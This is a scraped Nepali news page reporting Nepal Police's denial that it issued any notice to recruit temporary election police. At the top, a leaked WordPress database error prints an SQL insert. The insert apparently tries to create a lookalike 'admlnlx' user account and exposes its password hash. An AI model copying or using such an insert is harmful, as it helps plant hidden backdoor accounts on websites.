WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B25azyx1elgtnKIrMc3FbSowEQlvAq.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 12:32:34', '', 'admlnlx', 'admlnlx')

‘म्यादी प्रहरी माग गरिएको छैन’ – Gaule Khabar

‘म्यादी प्रहरी माग गरिएको छैन’

‘म्यादी प्रहरी माग गरिएको छैन’

काठमाण्डौ । स्थानीय तह निर्वाचनका लागि म्यादी प्रहरी सम्बन्धी सूचना प्रकाशित÷प्रसारित नगरिएको नेपाल प्रहरीले स्पष्ट पारेको छ ।

निर्वाचनमा आवश्यक पर्ने अस्थायी सुरक्षाकर्मी (म्यादी प्रहरी) भर्नासम्बन्धी सूचना जारी भएको भनी सामाजिक सञ्जालमा राखिएको पाइएको उल्लेख गर्दै प्रहरी प्रधान कार्यालयले आज एक विज्ञप्ति जारी गरी हालसम्म यस्तो सूचना प्रकाशित÷प्रसारित नगरिएको जानकारी गराएको छ । आवश्यक पर्ने म्यादी प्रहरीका सम्बन्धमा नेपाल प्रहरीको वेबसाइट र सार्वजनिक सञ्चार माध्यमबाट भविष्यमा प्रकाशित हुने प्रहरी प्रवक्ता प्रहरी वरिष्ठ उपरीक्षक विष्णुकुमार केसीद्वारा जारी विज्ञप्तिमा उल्लेख छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका